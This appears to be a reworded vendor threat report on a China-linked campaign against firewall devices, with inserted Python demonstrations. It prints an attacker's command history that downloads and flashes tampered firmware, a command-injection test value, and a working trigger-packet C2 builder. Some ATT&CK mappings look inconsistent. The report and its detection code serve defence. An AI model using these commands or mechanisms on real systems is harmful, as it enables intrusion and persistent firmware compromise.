Scrutiny of a tomcat log, on a device left incompletely cleaned by the attackers, led to the revelation of the primary entry point – a command injection vulnerability within a Perl-driven module. This vulnerability was later classified as CVE-2022-3236. Further assessment unearthed a correlated telemetric artifact consistently identifying successful exploitation. Exploration of this new indicator unveiled that the Java-based Trojan was solely deployed to a subsection of targeted devices. The predominant persistence technique, common across all devices, was the compromised Perl component (for more details on this and other malware prevalent in this assault, refer to our Concealed Pathways document).
September 21, 2022: Mitigation and Communication
Sophos began deploying a hotfix to remediate CVE-2022-3236 and to remove any additional malware dropped on compromised devices.
Outreach to affected device owners began. As in earlier activity, victims were predominantly (but not exclusively) in Asia, with a particular concentration on military and state security organisations in one Southeast Asian country. In the same region, X-Ops also observed targeting of a handful of critical infrastructure providers, including water utilities and electricity generation facilities. Given the presumably limited intelligence value of these targets, X-Ops assessed with moderate confidence that the group might be preparing for disruptive operations.
September 23, 2022: Public Declaration
Sophos officially released an advisory on the CVE-2022-3236 exploits.
October 9, 2022: Indicators of Compromise
Sophos made available further IOCs.
June 1, 2023: Exploitation of Concealed Pathways
X-Ops observed threat actors scanning for and exploiting CVE-2022-3236, mostly on unpatched End of Life (EOL) devices. Reverting to TTPs seen in 2020, the targeting appeared indiscriminate and was likely intended to build operational relay boxes for later attacks. The attacks consistently used the JAR-based persistence seen earlier, with a uniformity suggesting automated exploitation. The identified Command and Control (C2) channels were traced to a Hong Kong ISP (IPTelecom Asia).
June 13, 2023: Aid Endeavors
Sophos renewed its efforts to help organisations still running EOL devices move to supported firmware versions.
November 27, 2023: Evasion of Patch
Routine X-Ops threat hunting revealed suspicious activity on a device that had received the CVE-2022-3236 hotfix. Further analysis confirmed malicious JAR files and a connection to a C2 IP (T1406). Pivoting on the C2 exposed a small number of devices, all patched for CVE-2022-3236, whose log artifacts indicated successful exploitation of the vulnerability.
November 28, 2023: An Aberrant Circumvention
Log analysis by X-Ops revealed an unusual exception coinciding with the moment of exploitation. Examination of the source code pinpointed a bypass of the CVE-2022-3236 patch on devices running older firmware versions. By supplying malformed JSON, the attackers triggered an exception that skipped the additional input sanitization the patch had introduced to mitigate CVE-2022-3236. On newer firmware versions, additional code hardening prevented the bypass, limiting its usefulness.
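The bypass pattern described above, as an added Python illustration (not the Sophos Perl component, whose code is not shown here): the patched handler validates well-formed JSON, but a JSONDecodeError is caught "for compatibility" and routed to the old regex-based parser, which still feeds attacker input straight into a command string. The field name, the command and the request bodies are hypothetical.

```python
import json
import re
import shlex

# Added illustration of the exception-path bypass; not Sophos code. The field
# name "user", the "lookup_user" command and the bodies below are hypothetical.

SAFE_VALUE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def legacy_extract(raw):
    """Pre-patch parser: scrape the field with a regex. It never checks that
    the body is valid JSON, let alone that the value is safe."""
    m = re.search(r'"user"\s*:\s*"([^"]*)"', raw)
    return {"user": m.group(1)} if m else {}


def validate(fields):
    """The sanitization the patch introduced: accept only short, plain values."""
    if not isinstance(fields, dict):
        raise ValueError("body is not an object")
    for key, value in fields.items():
        if not isinstance(value, str) or not SAFE_VALUE.match(value):
            raise ValueError(f"rejected value for {key!r}")
    return fields


def build_command(fields):
    """The string that would eventually be handed to a shell (shown, not run)."""
    return f"lookup_user {fields.get('user', '')}"


def handle_patched(raw):
    """Patched but bypassable: a parse failure falls back to legacy_extract,
    and nothing on that path is validated."""
    try:
        fields = json.loads(raw)
    except json.JSONDecodeError:
        fields = legacy_extract(raw)   # attacker-controlled, unvalidated
    else:
        validate(fields)
    return build_command(fields)


def handle_fixed(raw):
    """Fail closed: unparseable bodies are rejected, every path is validated,
    and the value is shell-quoted as defence in depth."""
    try:
        fields = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError("malformed request body") from exc
    validate(fields)
    return f"lookup_user {shlex.quote(fields.get('user', ''))}"


def rejected(handler, raw):
    """True if the handler refuses the body."""
    try:
        handler(raw)
    except ValueError:
        return True
    return False


# Constructed request bodies
BENIGN = '{"user": "alice"}'
INJECT = '{"user": "alice; id"}'   # well-formed: the patch catches this
BYPASS = '{"user": "alice; id"'    # unclosed object: parse fails, fallback runs

if __name__ == "__main__":
    for body in (BENIGN, INJECT, BYPASS):
        for handler in (handle_patched, handle_fixed):
            outcome = "rejected" if rejected(handler, body) else handler(body)
            print(f"{handler.__name__:15} {body!r:28} -> {outcome}")
```

The log signature the report describes follows directly from this structure: the bypass request always produces a parse exception, so an exception logged at the moment of an otherwise successful request is the artifact to hunt for.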
On the same day, X-Ops received intelligence from a non-Asian government partner about ongoing scanning of vulnerable devices in its jurisdiction. This was significant because CVE-2022-3236 activity observed so far had been focused predominantly on Southeast Asian targets.
November 29 – December 11, 2023: Mitigation for Bypass
Sophos engineering released phased hotfixes to address the bypass. To broaden coverage, the fix was backported to several out-of-support but widely deployed firmware versions.
December 11, 2023: Outreach and Attribution
Sophos began outreach to the small number of entities affected by the bypass. Although X-Ops observed little exploitation of it, the victim profile was distinctive: in contrast to earlier targeted attacks, the victims were primarily government entities outside Southeast and South Asia. The post-exploitation toolset was relatively mundane (mostly variants of known open-source tools such as zscan, fscan and Chisel), yet it was markedly different from that seen in previous attacks. Likewise, the identified C2 IPs (all associated with Cloudflare and RackNerd) geolocated to non-Asian countries, whereas most earlier C2 IPs were linked to Asian hosting providers.
These differences led X-Ops to assess with confidence that the bypass was the work of a different group. Its targeting nonetheless remained aligned with the foreign policy objectives of the People's Republic of China; notably, an embassy was compromised shortly before it hosted senior officials of the Chinese Communist Party Politburo.
Subtle under-the-radar activities
After the Concealed Pathways campaign, the adversary sought to avoid detection by deploying existing exploits at small scale against specific targets and by tightening operational security, both during attacks and when researching and analysing devices they themselves owned.
These attacks mostly targeted critical installations whose administrators had not kept firmware up to date and so lacked patches for known vulnerabilities.
July 2022 – February 2023: A display of simplicity
X-Ops played a supporting role in an incident at a nuclear regulatory agency, working with the national security and intelligence services of the country concerned.
Routine monitoring detected a device downloading suspicious binaries from a web server on the LAN side (T1105). X-Ops promptly alerted the affected entity and asked for further information.
With the help of a domestic government agency, X-Ops obtained malware samples from the device, revealing a RAT alongside open-source utilities. The RAT was a straightforward back-connect shell, activated when the device received a specially crafted packet (T1205), a behaviour X-Ops had previously seen in both the Cloud Snooper and Personal Panda attacks. Analysts struggled to pinpoint the C2 IP address of the back-connect because it was carried in the crafted packet rather than stored on the device.
The open-source tools deployed included Fast Reverse Proxy (FRP) and sbd, a netcat clone with built-in encryption (T1090). CISA later published an advisory on the threat group Volt Typhoon's use of FRP, but X-Ops found no conclusive evidence tying these attacks to Volt Typhoon.
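An added illustration of the traffic-signaling design described above (not the RAT's real wire format, which this page does not describe): the back-connect target lives only in the trigger packet, so static analysis of the implant yields no C2 address. With the shared key recovered from a sample, an analyst can decode captured packets to recover where the device was told to connect. The magic bytes, key and capture are constructed for this example; the raw-socket sniffing a real implant would need is omitted.

```python
import hashlib
import hmac
import socket
import struct

MAGIC = b"\x7fSIG"                 # hypothetical trigger marker
TAG_LEN = 16                       # truncated HMAC-SHA256 authenticates the trigger
KEY = b"example-shared-secret"     # hypothetical key "recovered from the sample"


def build_trigger(c2_ip, c2_port, key=KEY):
    """Operator side: pack the back-connect target into the trigger packet."""
    body = MAGIC + socket.inet_aton(c2_ip) + struct.pack("!H", c2_port)
    tag = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return body + tag


def parse_trigger(payload, key=KEY):
    """Implant side: return (ip, port) for a genuine trigger, else None.
    Nothing about the C2 is stored on disk; it arrives with the packet."""
    expected_len = len(MAGIC) + 4 + 2 + TAG_LEN
    if len(payload) != expected_len or not payload.startswith(MAGIC):
        return None
    body, tag = payload[:-TAG_LEN], payload[-TAG_LEN:]
    good = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, good):
        return None                # forged or replayed-with-edits: ignore
    ip = socket.inet_ntoa(body[len(MAGIC):len(MAGIC) + 4])
    (port,) = struct.unpack("!H", body[len(MAGIC) + 4:])
    return ip, port


def scan_capture(packets, key=KEY):
    """Analyst side: decode every valid trigger in an (src_ip, payload) list,
    returning (trigger_source, c2_ip, c2_port) tuples."""
    found = []
    for src, payload in packets:
        target = parse_trigger(payload, key)
        if target is not None:
            found.append((src, target[0], target[1]))
    return found


# Constructed capture: ordinary traffic, a genuine trigger, and a forged one
_genuine = build_trigger("203.0.113.7", 4444)
CAPTURE = [
    ("192.0.2.10", b"GET / HTTP/1.1\r\n\r\n"),
    ("198.51.100.7", _genuine),
    ("198.51.100.8", _genuine[:-1] + bytes([_genuine[-1] ^ 0xFF])),  # bad tag
]

if __name__ == "__main__":
    for src, ip, port in scan_capture(CAPTURE):
        print(f"trigger from {src}: back-connect to {ip}:{port}")
```

The practical consequence for responders is the one the report draws: without a capture of the trigger packet (or the key and a later capture), the C2 address cannot be recovered from the device alone.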
For persistence, the attacker renamed the legitimate device binary "nasm" to "nasmd" and placed the RAT in its original location. The system was already configured to execute "nasm" at boot. When run, the RAT spawned the original binary so that no functional disruption would be noticed.
A follow-up hunt for similar malware found devices with a comparable set of payloads to those discovered at the nuclear regulatory agency, located at a military command facility and at the national capital's airport in the same country.
As with the CVE-2020-15069 attacks three years earlier, this attack was notable for its simplicity and skilful execution. It was also the first time X-Ops observed an attack that probably originated from the LAN side of the device. X-Ops also found log entries suggesting the attackers used valid credentials to launch their tools, and saw tool downloads originating from an RFC 1918 address (T1078).
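An added check (not from the report) for the persistence trick in the "nasm"/"nasmd" paragraph above: given a trusted baseline of path-to-hash mappings from a clean firmware image and the current state of the device, report every path whose content changed and, where the original content survives under another name, say where it went. The listings and digests below are constructed placeholders; the hash_tree helper shows how to build real ones from an offline-mounted root.

```python
import hashlib
import os


def hash_tree(root):
    """Walk a mounted filesystem (e.g. an offline root) and map
    relative path -> sha256 of the file's contents. Symlinks are skipped."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out


def find_displaced_binaries(baseline, current):
    """Compare two path->digest maps. For every baseline path whose content
    changed, report the new digest and any path where the ORIGINAL content
    now lives (the renamed-original pattern: nasm -> nasmd)."""
    by_hash = {}
    for path, digest in current.items():
        by_hash.setdefault(digest, []).append(path)
    findings = []
    for path, known in sorted(baseline.items()):
        now = current.get(path)
        if now is None or now == known:
            continue
        findings.append({
            "path": path,
            "current_sha256": now,
            "original_now_at": sorted(p for p in by_hash.get(known, []) if p != path),
        })
    return findings


def find_new_files(baseline, current):
    """Paths present on the device but absent from the clean baseline."""
    return sorted(set(current) - set(baseline))


# Constructed listings; the digests are placeholders, not real hashes.
BASELINE = {"bin/nasm": "sha-nasm-v1", "bin/sh": "sha-sh-v1", "bin/ls": "sha-ls-v1"}
CURRENT = {"bin/nasm": "sha-rat", "bin/nasmd": "sha-nasm-v1",
           "bin/sh": "sha-sh-v1", "bin/ls": "sha-ls-v1"}

if __name__ == "__main__":
    for f in find_displaced_binaries(BASELINE, CURRENT):
        print(f"{f['path']}: content replaced; original now at {f['original_now_at']}")
    print("new files:", find_new_files(BASELINE, CURRENT))
```

Run hash_tree against a clean image of the same firmware version and against the suspect device mounted read-only; a finding whose original content reappears under a near-identical name is the signature of this technique, while a finding with no relocation points at a simple overwrite.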
August 15, 2022: Transition from rootkits to bootkits
An unfamiliar file appeared on a bare-metal device that X-Ops had previously flagged as suspicious and was monitoring as part of its targeted surveillance effort. A review of the command-line history revealed modifications being made to the device's firmware:
```sh
# fetch flashrom and the modified firmware image from an internal FTP server
ftpget -u admin -p password 10.10.10[.]110 ./flashrom ./flashrom
ftpget -u admin -p password 10.10.10[.]110 xg210-remove-dxe-guard-bds-infected.bin xg210-remove-dxe-guard-bds-infected.bin
chmod 777 flashrom
# dump /dev/sda from byte offset 392446464 onward to an image file
{ dd bs=392446464 skip=1 count=1; cat; } < /dev/sda > ./ext4_1_19.img
# probe the SPI flash, read the current contents, then write the modified image
./flashrom -p internal -c "Opaque flash chip"
./flashrom -p internal -c "Opaque flash chip" -r xg210-read.bin
./flashrom -p internal -c "Opaque flash chip" -w xg210-remove-dxe-guard.bin
```
X-Ops obtained a copy of a file, "/bin/XG210-rkloadtest.bin", and identified it as an early-stage UEFI bootkit based on VectorEDK.
The device hosting the bootkit was registered to a company associated with Guangzhou but had been purchased by a Chengdu-based firm, and its telemetry came from an IP address geolocated to Chengdu.
Despite deploying additional detections, X-Ops has not yet seen this capability used in the wild.
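As an added example (not tooling from the report), what a responder does with the image read by `flashrom -r` and the image the attacker wrote: compare them byte for byte and attribute each differing range to the UEFI firmware volume that contains it, found by scanning for the `_FVH` signature (offset 40 of EFI_FIRMWARE_VOLUME_HEADER, with FvLength at offset 32). The two images are constructed in the block; real SPI dumps also contain a flash descriptor and non-UEFI regions, so a change outside any volume is reported with owner None.

```python
import hashlib
import struct

FV_SIG = b"_FVH"
FV_LEN_OFFSET = 32   # EFI_FIRMWARE_VOLUME_HEADER.FvLength (UINT64)
FV_SIG_OFFSET = 40   # EFI_FIRMWARE_VOLUME_HEADER.Signature


def find_firmware_volumes(img):
    """Return [(start, length)] for every plausible firmware volume in img."""
    vols = []
    pos = img.find(FV_SIG)
    while pos != -1:
        start = pos - FV_SIG_OFFSET
        if start >= 0:
            (length,) = struct.unpack_from("<Q", img, start + FV_LEN_OFFSET)
            if 0 < length <= len(img) - start:      # sanity-check the header
                vols.append((start, length))
        pos = img.find(FV_SIG, pos + 1)
    return vols


def diff_regions(a, b, merge_gap=16):
    """Byte-compare two same-sized images; return [(offset, length)] of
    differing runs, merging runs separated by at most merge_gap bytes."""
    if len(a) != len(b):
        raise ValueError(f"image sizes differ: {len(a)} vs {len(b)}")
    regions, start, last = [], None, None
    for i, (x, y) in enumerate(zip(a, b)):
        if x == y:
            continue
        if start is not None and i - last > merge_gap:
            regions.append((start, last - start + 1))
            start = None
        if start is None:
            start = i
        last = i
    if start is not None:
        regions.append((start, last - start + 1))
    return regions


def attribute(regions, vols):
    """Tag each differing region with the index of the volume containing it."""
    tagged = []
    for off, ln in regions:
        owner = next((i for i, (s, l) in enumerate(vols) if s <= off < s + l), None)
        tagged.append((off, ln, owner))
    return tagged


def compare_images(clean, suspect):
    """The summary a responder wants: both hashes and every modified range,
    attributed to the firmware volume it falls in."""
    return {
        "clean_sha256": hashlib.sha256(clean).hexdigest(),
        "suspect_sha256": hashlib.sha256(suspect).hexdigest(),
        "modified": attribute(diff_regions(clean, suspect), find_firmware_volumes(clean)),
    }


# Constructed images: two minimal volumes with valid headers, then four bytes
# overwritten inside the second one.
def _fake_volume(length, fill):
    hdr = bytearray(48)
    struct.pack_into("<Q", hdr, FV_LEN_OFFSET, length)
    hdr[FV_SIG_OFFSET:FV_SIG_OFFSET + 4] = FV_SIG
    return bytes(hdr) + bytes([fill]) * (length - len(hdr))


CLEAN = _fake_volume(0x800, 0xFF) + _fake_volume(0x800, 0xAA)
_t = bytearray(CLEAN)
_t[0x900:0x904] = b"EVIL"
TAMPERED = bytes(_t)

if __name__ == "__main__":
    print(compare_images(CLEAN, TAMPERED))
```

A modified range inside a DXE volume, rather than in NVRAM or padding, is what distinguishes a bootkit write from the ordinary variable churn that also changes a flash image between two reads.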
March 23 – April 19, 2023: Targeting the supply chain
Routine X-Ops threat hunting uncovered suspicious files running in memory (and deleted from disk) on a device operated by a government-affiliated technology supplier serving several strategic sectors.
X-Ops obtained a sample from the affected device and, pivoting on the C2 domain, identified another compromised device owned by the same entity. A broader look at all devices belonging to the entity revealed a considerable surge in activity; all but one of the affected devices were tied to that entity (the exception belonged to a government-controlled telecommunications provider).
The retrieved samples comprised:
- The port-mapping tool LCX
- Microsocks, a portable SOCKS5 server, bundled with the hardcoded password "Pa55W0rd"
- A sophisticated 64-bit ELF backdoor of unclear origin, capable of sniffing user and admin credentials submitted to the device. Because the devices were domain-joined, this likely led to the theft of privileged internal Active Directory credentials (T1649)
- A Go binary obfuscated with the relatively obscure "go-strip" tool. It took a DES-encrypted configuration as a parameter and, on execution, connected to the specified C2 server to provide command execution and file transfer
The attacker's use of Go and Python showed more refined tooling than in previously observed incidents.
May 17-19, 2023: Persistent firmware upgrade strategy
During routine threat hunting, X-Ops found a remote shell on a single device owned by a government intelligence agency.
While the remote shell itself was unremarkable, X-Ops identified a previously unseen persistence method. Using the open-source tool plthook, the attackers hooked the firmware upgrade process (T1037.002). The hook wrote the backdoor into the temporary partition staged for the new firmware before the device rebooted, so that it survived firmware upgrades (recovery was still possible by reflashing the firmware from an external USB drive).
To defeat integrity checks, the attackers replaced the binaries that verify the cryptographic signature of the firmware (T1027.001). Once those binaries are under attacker control, a successful on-device verification proves nothing: the installed image has to be verified off the device, against signatures or hashes obtained from the vendor.
Comprehensive analysis led X-Ops to conclude that the malware was most likely deployed using valid administrative credentials (T1078).
X-Ops also identified a probable attacker-controlled device holding a copy of the firmware-persistent malware (T1542.001). The virtual machine, located in Shanghai, showed frequent software changes and was most recently seen running the same (dated) software version as the affected system.
March 2024: EOL device operations
X-Ops received information that End of Life (EOL) devices still vulnerable to CVE-2022-3236, CVE-2022-1040 and CVE-2020-29574 were being compromised and used as relay nodes for onward attacks (notably against Ivanti targets). The affected devices were running a Dropbear SSH server on port 58900, and the attackers had deliberately disabled monitoring and remote updates to hinder detection and response.
Sophos X-Ops is open to collaborating with other parties and sharing additional specific indicators of compromise (IOCs) based on individual cases. Reach out to us at pacific_rim@sophos.com
For the complete narrative, please visit our landing page Sophos Pacific Rim: Stand against Chinese Cyber Threats.
Acknowledgments
Sophos would like to express gratitude for the contributions of ANSSI, Barracuda, Bugcrowd, CERT-In, CISA, Cisco Talos, Digital Shadows (now part of Reliaquest), FBI, Fortinet, JCDC, Mandiant, Microsoft, NCA, NHCTU, NCSC-NL, NCSC-UK, NSA, Palo Alto Networks, Recorded Future, Secureworks and Volexity to this report, or to investigations covered in this report.
Refer to Table 1 through Table 10 for all threat actor tactics and techniques mentioned in this report. For guidance on mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK's Best Practices for MITRE ATT&CK Mapping and CISA's Decider Tool.
Table 1. Resource Development

| Technique | ID | Use |
|---|---|---|
| Compromise Infrastructure: Network Devices | T1584.008 | During analysis within a Sophos honeypot, investigators noted the attackers had used User-Agent strings and payload requests associated with consumer and SOHO routers, along with various requests potentially linked to Ragnarok ransomware. |
Table 2. Initial Access

| Technique | ID | Use |
|---|---|---|
| Valid Accounts | T1078 | The attackers deployed malware using valid administrative accounts. |
| Valid Accounts: Cloud Accounts | T1078.004 | The attackers pivoted from on-premises devices to cloud resources by abusing an IAM configuration associated with AWS SSM. |
| Exploit Public-Facing Application | T1190 | The attackers targeted devices with publicly accessible web interfaces. |
| Drive-by Compromise | T1189 | The attackers deployed malicious software targeting Mac OS X and iOS, and IFRAME injection code exploiting a vulnerability in WebAssembly (wasm). |
Table 3. Defense Evasion

| Technique | ID | Use |
|---|---|---|
| Masquerading: Match Legitimate Name or Location | T1036.005 | The attackers replaced SSH and SSHD with versions affiliated with the malware family known as Onderon, as identified by ESET. |
| Obfuscated Files or Information: Binary Padding | T1027.001 | The attackers replaced the binaries responsible for verifying the cryptographic signature of the firmware in order to evade integrity checks. |
| Rootkit | T1014 | The attackers implanted a rootkit called Cloud Snooper on a target device to conceal malicious C2 traffic. They also deployed the rootkit libsophos.so. |
| Masquerading | T1036 | The attackers renamed a legitimate device binary and placed a Remote Access Trojan (RAT) in its place. They also used a custom, fully featured userland rootkit that closely imitated Sophos product file names and behaviour. |
| Impair Defenses | T1562 | The attackers bypassed the fix for CVE-2022-3236 by supplying malformed JSON that triggered an exception, skipping the additional input validation that would have mitigated the vulnerability. |
| Impair Defenses: Disable or Modify Tools | T1562.001 | The attackers introduced a script named patch.sh that changed a database setting to disable automatic patch updates, re-running the command every five minutes. |
| Impair Defenses: Indicator Blocking | T1562.006 | The attackers ran a script loop that continuously set the administrative setting to reject patches, impairing the victim's ability to remediate the devices. |
| Indirect Command Execution | T1202 | The attackers exploited a command injection vulnerability (CVE-2022-3236) in a Perl-based component for initial access to a device. |
| Obfuscated Files or Information | T1406 | The attackers used malicious JAR files and connected to a Command and Control (C2) IP on a device that had already received the patch for CVE-2022-3236. |
Table 4. Credential Access

| Technique | ID | Use |
|---|---|---|
| OS Credential Dumping: DCSync | T1003.006 | The attackers used intercepted credentials to perform a DCSync credential extraction from a domain controller on the local network. |
| Brute Force: Password Guessing | T1110.001 | The attackers gained initial access to several affected devices through weak SSH credentials. |
| Steal or Forge Authentication Certificates | T1649 | The attackers obtained privileged internal Active Directory credentials using a 64-bit ELF backdoor. |
| Exploitation for Credential Access | T1212 | The attackers exploited CVE-2020-15069 to deploy a program that stole stored credentials on a specific device. |
Table 5. Discovery

| Technique | ID | Use |
|---|---|---|
| Network Service Discovery | T1046 | The attackers performed network scans from a low-privilege machine in the victim's network. |
Table 6. Lateral Movement

| Technique | ID | Use |
|---|---|---|
| Exploitation of Remote Services | T1210 | The attackers exploited an authenticated remote code execution vulnerability in an operating system component. |
| Remote Services: SSH | T1021.004 | The attackers injected the libsophos.so library into sshd using the LD_PRELOAD environment variable. |

Tables 7 through 9 are truncated here. The only recoverable content is a fragment of one entry ("... enabling it to endure firmware updates") and the technique IDs T1205, T1133, T1136.001, T1574.004 and T1547.
Table 10. Privilege Escalation

| Technique | ID | Use |
|---|---|---|
| Valid Accounts: Cloud Accounts | T1078.004 | The attackers abused an overly permissive IAM configuration associated with AWS SSM to gain access to cloud resources from on-premises devices. |
Throughout this five-year investigation, analysts closely monitored potentially pertinent research and events, often collaborating with the authors and teams behind the reports. To assist future research endeavors, we have included a selection of research works that facilitated our comprehension of the monitored actors and potentially associated groups and operations.
While crafting our analysis of the events centered around Sophos as detailed in this report, we also observed a surge in network device vulnerabilities being disclosed by various vendors, frequently with subsequent active exploitation. To underscore the extent of global threat activities, and as a possibly beneficial communal asset, we have compiled a roster of publicly documented CVEs impacting network (and other edge) devices provided by a variety of vendors. In scenarios where pertinent public research is available, we have included information on active exploitation and suspected threat actors. This compilation is sourced from publicly accessible channels and diligent searches of publicly available data as of mid-October 2024, as outlined in the table below.
| Data feature | Source |
|---|---|
| Vendor | Vendor website |
| Title | NIST National Vulnerability Database (https://nvd.nist.gov/) |
| CVE | NIST National Vulnerability Database (https://nvd.nist.gov/) |
| CVSS | NIST National Vulnerability Database (https://nvd.nist.gov/) |
| NVD publication date | NIST National Vulnerability Database (https://nvd.nist.gov/) |
| Vendor advisory date | Vendor website |
| Used in ransomware attacks | Publicly available data |
| Date added to KEV catalog | CISA Known Exploited Vulnerabilities Catalog (https://www.cisa.gov/known-exploited-vulnerabilities-catalog) |
| Vendor advisory | Vendor website |
| Date exploitation became known | Publicly available data |
| Threat actor | Publicly available data |
| Targets | Publicly available data |
Twenty-four vendors are featured in the information. This selection is based on market prevalence and general interest. Inclusion should not be construed as indicative of any relationship to the situations documented elsewhere in the Pacific Rim coverage.
| Arcadyan Technology | F5 | Palo Alto Networks |
| Barracuda Networks | FatPipe Networks | Pulse Secure [Ivanti] |
| Check Point Software | Fortinet | SonicWall |
| Cisco Systems | Juniper Networks | Sophos |
| Citrix Systems | MikroTik | Sumavision Technologies |
| DASAN Networks | Netgear | Tenda |
| D-Link Systems | Netis Systems | TP-Link |
| DrayTek | Oracle | Zyxel |
Sophos encourages contributions or amendments to this compilation and may opt to update it in the future if deemed necessary. The data is stored in a GitHub repository at https://github.com/sophoslabs/NetDeviceCVEs.
A list of compromise indicators can be found on the Sophos X-Ops GitHub for each of the specific attacks delineated in this report:
Note: These lists do not cover all possible IOCs. They concentrate on major, mainly network-related IOCs that defenders are likely equipped to search for. Given the historical nature of much of this activity, the timeframe of any detections should be carefully evaluated and cross-referenced with this report.
